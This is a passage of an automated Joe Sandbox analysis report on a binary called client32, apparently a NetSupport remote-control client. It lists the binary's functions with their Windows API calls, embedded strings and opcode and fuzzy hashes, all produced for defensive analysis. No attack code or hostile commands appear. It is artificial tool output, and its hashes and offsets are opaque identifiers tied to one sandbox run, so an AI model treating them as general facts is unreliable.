                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Directory$FolderPathSystemWindows
                                                                              • String ID: "%PROG%$%SYS%$%WIN%$c:\program files
                                                                              • API String ID: 1538031420-1992112792
                                                                              • Opcode ID: e9a016464172d398cdd25842ee37a2f59ed83bca3c4f484902448cdd84f2952e
                                                                              • Instruction ID: 2623f2ed80b282b5754acc89838a0d53b3ad1afe3f6d6f3bb9299b9b15bf7866
                                                                              • Opcode Fuzzy Hash: e9a016464172d398cdd25842ee37a2f59ed83bca3c4f484902448cdd84f2952e
                                                                              • Instruction Fuzzy Hash: 50412775E0461A5FCB15CE348C94BEAB7E9EF8930DF0041E8E899D7644EBB59944CB80
                                                                              Function 11061710 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 136registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • InitializeCriticalSection.KERNEL32(0000000C), ref: 11061790
                                                                              • RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,11195264,00000000,0002001F,00000000,00000008,?,?,00000001,00000001), ref: 110617F5
                                                                              • RegCreateKeyExA.ADVAPI32(00000000,?,00000000,11195264,00000000,00020019,00000000,00000008,?), ref: 1106181C
                                                                              • RegCreateKeyExA.ADVAPI32(00000000,ConfigList,00000000,11195264,00000000,0002001F,00000000,?,?), ref: 1106185B
                                                                              • RegCreateKeyExA.ADVAPI32(?,ConfigList,00000000,11195264,00000000,00020019,00000000,?,?), ref: 1106188F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Create$CriticalInitializeSection_malloc_memsetwsprintf
                                                                              • String ID: ConfigList$PCICTL
                                                                              • API String ID: 4014706405-1939909508
                                                                              • Opcode ID: 2c662ba8e1a73180234ba1d403ad4cf72de73a80d5c76a4c65f103bbd16af89e
                                                                              • Instruction ID: f687ffc68a66fe95333fcb084f814ecf12f43e5332dda5a21faccb30f4540590
                                                                              • Opcode Fuzzy Hash: 2c662ba8e1a73180234ba1d403ad4cf72de73a80d5c76a4c65f103bbd16af89e
                                                                              • Instruction Fuzzy Hash: 205130B5A40319AFE710CF65CC85FAABBF8FB84B54F10851AF929DB280D774A504CB50
                                                                              Function 11027690 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 122windowsleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110276B3
                                                                              • TranslateMessage.USER32(?), ref: 110276E1
                                                                              • DispatchMessageA.USER32(?), ref: 110276EB
                                                                              • Sleep.KERNEL32(000003E8), ref: 11027774
                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110277DA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$DispatchSleepTranslate
                                                                              • String ID: Bridge$BridgeThread::Attempting to open bridge...
                                                                              • API String ID: 3237117195-3850961587
                                                                              • Opcode ID: 1b2e4e5877f7dd86e5b4f6ab3deaa022a5885a0bf8ec40fba6a4f6effec7cce7
                                                                              • Instruction ID: fbec7a20b3d6bea2ef121ca85947d2bcd6ffbd352c9b2bb3e3957ab5b94ca35b
                                                                              • Opcode Fuzzy Hash: 1b2e4e5877f7dd86e5b4f6ab3deaa022a5885a0bf8ec40fba6a4f6effec7cce7
                                                                              • Instruction Fuzzy Hash: F241B375E026369BE711CBD5CC84EBABBA8FB58708F500539E925D3248EB359900CBA1
                                                                              Function 110B9550 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowPlacement.USER32(00000000,0000002C,110C032C,?,Norm,110C032C), ref: 110B9594
                                                                              • MoveWindow.USER32(00000000,110C032C,110C032C,110C032C,110C032C,00000001,?,Norm,110C032C), ref: 110B9606
                                                                              • SetTimer.USER32(00000000,0000050D,000007D0,00000000), ref: 110B9661
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$ErrorExitLastMessageMovePlacementProcessTimerwsprintf
                                                                              • String ID: Norm$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$j CB::OnRemoteSizeNormal(%d, %d, %d, %d)$m_hWnd
                                                                              • API String ID: 1092798621-1973987134
                                                                              • Opcode ID: 0a507017cf31c888094ccedf1f2f22b67d6bec0d8edef4dbc35580d5be2b1013
                                                                              • Instruction ID: 30cf71d2af311bb900ca5215c998a4de0afb875ad97720b4279f64133f28c1c1
                                                                              • Opcode Fuzzy Hash: 0a507017cf31c888094ccedf1f2f22b67d6bec0d8edef4dbc35580d5be2b1013
                                                                              • Instruction Fuzzy Hash: F7411EB5B00609AFDB08DFA4C895EAEF7B5FF88304F104669E519A7344DB30B945CB90
                                                                              Function 1100F480 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 1100F4AD
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 1100F4D0
                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 1100F554
                                                                              • __CxxThrowException@8.LIBCMT ref: 1100F562
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 1100F575
                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100F58F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                              • String ID: bad cast
                                                                              • API String ID: 2427920155-3145022300
                                                                              • Opcode ID: 8ccc2bf3d075cb4470613d9a582e19481d5e19c5ba5466d2fc61ee55f0f68dd2
                                                                              • Instruction ID: b8b94bd42515a6f19c70bc81b3c192d65964a6c5da2ad5a69908043983276998
                                                                              • Opcode Fuzzy Hash: 8ccc2bf3d075cb4470613d9a582e19481d5e19c5ba5466d2fc61ee55f0f68dd2
                                                                              • Instruction Fuzzy Hash: BB31E475D002169FDB05CF64D890BEEF7B8EB05369F44066DD926A7280DB72A904CF92
                                                                              Function 11135700 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 91synchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(00000270,000003E8), ref: 1113572F
                                                                              • GetTickCount.KERNEL32 ref: 1113578C
                                                                                • Part of subcall function 111449B0: GetTickCount.KERNEL32 ref: 11144A18
                                                                              • wsprintfA.USER32 ref: 111357BC
                                                                                • Part of subcall function 110B86C0: ExitProcess.KERNEL32 ref: 110B8702
                                                                              • WaitForSingleObject.KERNEL32(00000270,000003E8), ref: 11135802
                                                                              Strings
                                                                              • UI.CPP, xrefs: 111357E9
                                                                              • Client possibly unresponsive for %d ms (tid=%d)Callstack:, xrefs: 111357B6
                                                                              • ResponseChk, xrefs: 11135717
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountObjectSingleTickWait$ExitProcesswsprintf
                                                                              • String ID: Client possibly unresponsive for %d ms (tid=%d)Callstack:$ResponseChk$UI.CPP
                                                                              • API String ID: 2020353970-2880927372
                                                                              • Opcode ID: 5a95c3d6314c03e37156d318e81db83d91de3644f47b7d5644618cf8ee851fd7
                                                                              • Instruction ID: 29029577b4cabcdd66728ddaf58dbb832e5c2d1ab8d81411842bafe300cf0b31
                                                                              • Opcode Fuzzy Hash: 5a95c3d6314c03e37156d318e81db83d91de3644f47b7d5644618cf8ee851fd7
                                                                              • Instruction Fuzzy Hash: 4331F431A01166DBE711CFA5CDC0FAAF3B8FB44719F400678E961DB688DB71A944CB91
                                                                              Function 110F1600 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 85fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000), ref: 110F1655
                                                                              • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 110F166A
                                                                                • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                              • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F16C3
                                                                              • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F1708
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$CreateName$ModulePathShort_strrchr
                                                                              • String ID: \\.\$nsmvxd.386$pcdvxd.386
                                                                              • API String ID: 1318148156-3179819359
                                                                              • Opcode ID: ec37fd08034eecc1aa46bd3ea59472c8ef6a7d7ee5c862681b8016f31a87d41d
                                                                              • Instruction ID: 97078bb132b3f47e4dd387b208782a62a76e0766a2a430eba886c9c4ac9a83c1
                                                                              • Opcode Fuzzy Hash: ec37fd08034eecc1aa46bd3ea59472c8ef6a7d7ee5c862681b8016f31a87d41d
                                                                              • Instruction Fuzzy Hash: 1A318130A44725AFD320DF64C891BD6B7F4BB1D708F008568E2A99B6C5D7B1B588CF94
                                                                              Function 110817B0 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 79COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memmove.LIBCMT ref: 11081859
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                              • String ID: !m_bReadOnly$..\CTL32\DataStream.cpp$IsA()$m_nLength>=nBytes$nBytes>=0$pData
                                                                              • API String ID: 1528188558-3417006389
                                                                              • Opcode ID: 6f86106b110defa54479cabce7875bddb0ed7807cbaf2af13202954436eb8da3
                                                                              • Instruction ID: 6b38151c30adb73325f8e92f0dfc04dea1f0409a136c72edecfa6b672fa6b7b9
                                                                              • Opcode Fuzzy Hash: 6f86106b110defa54479cabce7875bddb0ed7807cbaf2af13202954436eb8da3
                                                                              • Instruction Fuzzy Hash: 1A210B3DF187617FC602DE45BC83F9BF7E45F9165CF048039EA4627241E671A804C6A2
                                                                              Function 1103F720 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 77windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 1103F76C
                                                                              • SetDlgItemTextA.USER32(?,00000471,?), ref: 1103F784
                                                                              • DestroyCursor.USER32(00000000), ref: 1103F7A1
                                                                              • SetDlgItemTextA.USER32(?,00000471,00000000), ref: 1103F7B4
                                                                              • UpdateWindow.USER32(00000000), ref: 1103F7F2
                                                                                • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1103F7DC
                                                                              • m_hWnd, xrefs: 1103F7E1
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ItemText$CursorDestroyExtractIconUpdateWindow_strrchr
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 3726914545-2830328467
                                                                              • Opcode ID: 73bb6436336379db390de3057b4568d21503c8f708411fbe6b6bfc52bf0a24e6
                                                                              • Instruction ID: 7fabd73ab2c015b19e51bb87ae7bab873905cbda80a3d362d09b7776c5ddc496
                                                                              • Opcode Fuzzy Hash: 73bb6436336379db390de3057b4568d21503c8f708411fbe6b6bfc52bf0a24e6
                                                                              • Instruction Fuzzy Hash: 4C21D1B9B40315BFE6219AA1DC86F5BB7A8AFC5B05F104418F79A9B2C0DBB4B4008756
                                                                              Function 1115F620 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetMenuItemCount.USER32(?), ref: 1115F62F
                                                                              • _memset.LIBCMT ref: 1115F64B
                                                                              • GetMenuItemID.USER32(?,00000000), ref: 1115F65C
                                                                                • Part of subcall function 111439A0: _memset.LIBCMT ref: 111439C9
                                                                                • Part of subcall function 111439A0: GetVersionExA.KERNEL32(?), ref: 111439E2
                                                                              • CheckMenuItem.USER32(?,00000000,00000000), ref: 1115F698
                                                                              • EnableMenuItem.USER32(?,00000000,00000000), ref: 1115F6AE
                                                                              • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 1115F6C4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ItemMenu$_memset$CheckCountEnableInfoVersion
                                                                              • String ID: 0
                                                                              • API String ID: 176136580-4108050209
                                                                              • Opcode ID: 952994a233711950fdab02d23ca0bcaac5a8ee4e392a6680f60084daabe75429
                                                                              • Instruction ID: be0221c4a5135c336c62c383b80ea9a6d71c1dc3530fa78f313eaeef8d4c2bd6
                                                                              • Opcode Fuzzy Hash: 952994a233711950fdab02d23ca0bcaac5a8ee4e392a6680f60084daabe75429
                                                                              • Instruction Fuzzy Hash: C621A17591111AABE741DB74CE84FAFBBACEF46358F104025F961E6160DB74DA00C772
